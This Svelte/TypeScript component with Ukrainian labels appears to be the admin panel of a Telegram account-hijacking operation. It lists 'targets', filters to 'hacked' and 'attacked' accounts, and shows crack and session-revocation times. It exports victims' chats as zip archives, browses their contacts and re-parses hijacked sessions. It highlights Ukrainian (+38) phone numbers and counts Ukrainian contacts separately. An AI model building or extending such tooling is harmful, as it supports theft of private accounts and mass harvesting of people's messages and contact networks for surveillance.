<script lang="ts">
    import {authFetch} from "../Auth";
    import {overlay} from "../Store";
    import type {UserData, UserNameData} from "../Types";
    import {getRouteById} from "../Nav";
    import Sort from "../Component/Sort.svelte";
    import throttle from "@jcoreio/async-throttle";
    import {DateTime} from "luxon";
    import {MessageStatus, strToLocaleDateTime} from "../Utils";
    import ExportDialog from "../Component/ExportDialog.svelte";
    import {getContext} from "svelte";
    const { open } = getContext('simple-modal');

    export const params = {}
    let filter = {
        offset: 0,
        limit: 100,
        phrase: "",
        is_required_repeat_parse: false,
        parsed: true,
        was_attacked: false,
        order: "DESC",
        orderBy: "cracked_at"
    }
    let list: UserData[] = []
    let count: number = 0
    let listPromise: Promise<any>

    let onInput = throttle(()=>{
        update()
    }, 1000)

    async function loadList() {
        let response = await authFetch('users/list', {
            method: 'POST',
            body: JSON.stringify(filter),
        })
        if (response.ok) {
            let data = await response.json()
            list = data.list
            count = data.count
        } else {
            alert(response.statusText)
        }
    }

    function onSort(ev: Event){
        if(ev.detail.order === null){
            filter.order = "DESC"
            filter.orderBy = "id"
        } else {
            filter.order = ev.detail.order
            filter.orderBy = ev.detail.orderBy
        }
        update()
    }
    function update(){
        listPromise = loadList()
    }
    function onOpenExportModal(userId) {
        open(
            ExportDialog,
            {
                message: "Параметри експорту",
                userId: userId,
                onOkay: onDownload
            },
            {
                closeButton: true,
                closeOnEsc: true,
                closeOnOuterClick: true,
            }
        );
    }
    async function onDownload(fromDate, toDate, userId){
        overlay.set('Downloading')
        try{
            let response = await authFetch(`export/zip`, {
                method: 'POST',
                body: JSON.stringify({
                    'userId': userId,
                    'fromDate': fromDate,
                    'toDate': toDate
                }),
            })
            let filename = 'export.zip'
            if(response.ok){
                let header = response.headers.get('Content-Disposition');
                let parts = header!.split(';');
                if (parts.length > 0) {
                    filename = parts[1].split('=')[1];
                    filename = filename.replace(/(^"|"$)/g, '').trim();
                }

                let blob = await response.blob();
                let a = document.createElement('a');
                document.body.appendChild(a);

                let url = window.URL.createObjectURL(blob);
                a.href = url;
                a.download = filename;
                a.click();

                setTimeout(() => {
                    window.URL.revokeObjectURL(url);
                    document.body.removeChild(a);
                }, 10)
            } else {
                alert(response.statusText)
            }
        } catch (error) {
            console.error(error)
        }finally {
            overlay.set(null)
        }
    }
    async function onRepeatParse(id) {
        let response = await authFetch('user/repeatParse', {
            method: 'POST',
            body: JSON.stringify({'id': id}),
        })
        if (response.ok) {
            let data = await response.json()
            let message: string|null = data.message ?? "Не отримали повідомлення від сервера" ;
            alert(message)
        } else {
            let body:string = await response.text()
            alert(body)
        }
    }
    update()
</script>
<style>
    .ua {
        background: rgba(255, 0, 0, 0.75);
        color: white;
    }
</style>
<table class="table table-bordered table-sm">
    <thead class="position-sticky bg-white shadow" style="z-index: 1030; top: 56px;">
        <tr style="border: 0px;">
            <th colspan="100">
                <div class="input-group">
                    <input class="form-control" type="search" placeholder="Ім'я / телефон / telegram_id"
                        bind:value={filter.phrase} on:keyup={onInput} on:change={onInput}>
                    <label class="btn btn-primary">
                        <input type="checkbox" class="form-check-input" autocomplete="off"
                            bind:checked={filter.parsed} on:change={update}>
                        &nbsp;Тількі взламані
                    </label>
                    <label class="btn btn-primary">
                        <input type="checkbox" class="form-check-input" autocomplete="off"
                            bind:checked={filter.is_required_repeat_parse} on:change={update}>
                        &nbsp;Повторний парсинг
                    </label>
                    <label class="btn btn-primary">
                        <input type="checkbox" class="form-check-input" autocomplete="off"
                            bind:checked={filter.was_attacked} on:change={update}>
                        &nbsp;Були атаковані
                    </label>
                    <button class="btn btn-info"
                        class:disabled={filter.offset===0}
                        on:click={()=>{filter.offset-=filter.limit;update()}}>
                        <i class="bi bi-chevron-left"></i>
                    </button>
                    <input class="form-control flex-grow-0" type="number" style="width: 5em;"
                           min="1"
                           max={Math.floor(count / filter.limit)+1}
                           step="1"
                           value={(filter.offset / filter.limit)+1}
                           on:change={(ev)=>{filter.offset=(ev.target.value - 1) * filter.limit; update()}}
                    >
                    <button class="btn btn-info disabled">
                        / {Math.floor(count / filter.limit)+1}
                    </button>
                    <button class="btn btn-info"
                            class:disabled={list.length < filter.limit}
                            on:click={()=>{filter.offset+=filter.limit;update()}}>
                        <i class="bi bi-chevron-right"></i>
                    </button>
                </div>
            </th>
        </tr>
        <tr style="border: 0px; font-size: 14px;">
            <th rowspan="2" style="min-width: 70px">ID <Sort orderBy="id" state={filter} orders={["ASC","DESC"]} on:sort={onSort}></Sort></th>
            <th rowspan="2" style:width="100%" style="min-width: 200px">Варіанти імені</th>
            <th rowspan="2" style="min-width: 130px"> Ім'я користувача Telegram</th>
            <th rowspan="2">Телефон</th>
            <th rowspan="2">Telegram ID</th>
            <th rowspan="2" style="min-width: 120px">Взламаний <Sort orderBy="cracked_at" state={filter} on:sort={onSort}></Sort></th>
            <th rowspan="2" style="min-width: 120px">Закрита сесія</th>
            <th rowspan="2" style="min-width: 130px">Створений <Sort orderBy="created_at" state={filter} on:sort={onSort}></Sort></th>
            <th colspan="5">Повідомлення</th>
            <th rowspan="2" colspan="2"></th>
        </tr>
        <tr style="font-size: 14px;" class="text-nowrap">
            <th>Cтатус</th>
            <th>Відправлено</th>
            <th>Видалено відп.</th>
            <th>Прочитано</th>
            <th>Видалено</th>
        </tr>
    </thead>
    <tbody>
    {#await listPromise}
        <tr>
            <td colspan="1000" class="text-center">
                <div class="spinner-grow"></div>
            </td>
        </tr>
    {:then _}
        {#if list.length > 0}
            {#each list as user}
                {@const successAt = user.login_attempts.sort((a, b)=>a.success_at>b.success_at?1:-1)[0]?.success_at ?? null}
                {@const revokedAt = user.login_attempts.sort((a, b)=>a.revoked_at>b.revoked_at?1:-1)[0]?.revoked_at ?? null}
                {@const rowspan = user.messages.length < 1 ? 1 : user.messages.length}
                <tr>
                    <td rowspan="{rowspan}">{user.id}</td>
                    <td rowspan="{rowspan}">
                        {#each user.backwardContacts as contact}
                            {#if contact?.user != null}
                                <a class="btn btn-sm btn-primary m-1"
                                   href="#{getRouteById('UserContacts').hash(contact.user.id, {phrase: contact.telegram_contact_id})}">
                                        {contact.first_name} {contact.last_name} {contact.username}
                                        <i class="bi bi-chevron-left"></i>
                                        {contact.user.username ?? (
                                            contact.user.names.length > 0 ? contact.user.names[0].name : contact.user.telegram_id
                                        )}
                                </a>
                            {/if}
                        {/each}
                        {#each user.names as user_name}
                            <button class="btn btn-sm btn-outline-dark m-1 disabled">{user_name.name}</button>
                        {/each}
                    </td>
                    <td rowspan="{rowspan}">
                        {#if (user.username)}
                        <button class="btn btn-sm btn-outline-dark m-1 disabled">{user.username}</button>
                        {/if}
                    </td>
                    <td rowspan="{rowspan}"
                        class:ua={(user.phone ?? '').indexOf('38')===0}>{user.phone ?? ''}</td>
                    <td rowspan="{rowspan}">{user.telegram_id ?? ''}</td>
                    <td rowspan="{rowspan}">{successAt ? strToLocaleDateTime(successAt): ''}</td>
                    <td rowspan="{rowspan}">{revokedAt ? strToLocaleDateTime(revokedAt): ''}</td>
                    <td rowspan="{rowspan}">{user.created_at ? strToLocaleDateTime(user.created_at) : ''}</td>
                    {#if user.messages.length > 0}
                            <td style="white-space: nowrap;">{MessageStatus[user.messages[0].status] ?? ''}</td>
                            <td style="white-space: nowrap;">{user.messages[0].sent_at ? strToLocaleDateTime(user.messages[0].sent_at): ''}</td>
                            <td style="white-space: nowrap;">{user.messages[0].telegram_deleted_at ? strToLocaleDateTime(user.messages[0].telegram_deleted_at) : ''}</td>
                            <td style="white-space: nowrap;">{user.messages[0].receiver_read_at ? strToLocaleDateTime(user.messages[0].receiver_read_at) : ''}</td>
                            <td style="white-space: nowrap;">{user.messages[0].receiver_deleted_at ? strToLocaleDateTime(user.messages[0].receiver_deleted_at): ''}</td>
                    {:else }
                        <td colspan="5"></td>
                    {/if}
                    <td rowspan="{rowspan}">
                        {#if successAt != null}
                            <span class="btn-group w-100">
                                <a class="btn btn-sm btn-outline-primary"
                                   href="#{getRouteById('UserChats').hash(user.id)}"
                                   style:width="3em">{user.total_chats}</a>
                                <a class="btn btn-sm btn-primary"
                                   href="#{getRouteById('UserChats').hash(user.id)}">Чати</a>
                            </span>
                        {:else }
                            <span>-</span>
                        {/if}
                    </td>
                    <td rowspan="{rowspan}">
                        {#if successAt != null}
                            <span class="btn-group w-100">
                                <a class="btn btn-sm btn-outline-danger"
                                   href="#{getRouteById('UserContacts').hash(user.id, {ua: 1})}"
                                   style:width="4em">{user.total_ua_contacts}</a>
                                <a class="btn btn-sm btn-outline-primary"
                                   href="#{getRouteById('UserContacts').hash(user.id, {ua: 0})}"
                                   style:width="4em">{user.total_contacts - user.total_ua_contacts}</a>
                                <a class="btn btn-sm btn-primary"
                                   href="#{getRouteById('UserContacts').hash(user.id)}">Контакти</a>
                            </span>
                        {:else }
                            <span>-</span>
                        {/if}
                    </td>
                    <td rowspan="{rowspan}">
                        {#if (successAt != null)}
                            <button class="btn btn-sm btn-primary"
                               on:click={()=>onOpenExportModal(user.id)}><i class="bi bi-file-zip"></i></button>
                        {:else }
                            <span>-</span>
                        {/if}
                    </td>
                    <td rowspan="{rowspan}">
                        {#if (successAt !== null && revokedAt === null)}
                            <button class="btn btn-sm btn-primary"
                               on:click={()=>onRepeatParse(user.id)}><i class="bi bi-arrow-repeat"></i></button>
                        {:else }
                            <span>-</span>
                        {/if}
                    </td>
                </tr>
                {#each user.messages as message, i}
                    {#if i > 0}
                        <tr style="white-space: nowrap;">
                            <td>{MessageStatus[message.status] ?? ''}</td>
                            <td>{message.sent_at ? strToLocaleDateTime(message.sent_at): ''}</td>
                            <td>{message.telegram_deleted_at ? strToLocaleDateTime(message.telegram_deleted_at) : ''}</td>
                            <td>{message.receiver_read_at ? strToLocaleDateTime(message.receiver_read_at) : ''}</td>
                            <td>{message.receiver_deleted_at ? strToLocaleDateTime(message.receiver_deleted_at): ''}</td>
                        </tr>
                    {/if}
                {/each}
            {/each}
        {:else}
            <tr>
                <td colSpan="1000" class="text-center">
                        <div class="alert alert-secondary">Немає цілей</div>
                </td>
            </tr>
        {/if}
    {:catch error}
        <tr>
            <td colSpan="1000" class="text-center">
                <div class="alert alert-danger">{error}</div>
            </td>
        </tr>
    {/await}
</tbody>
</table>
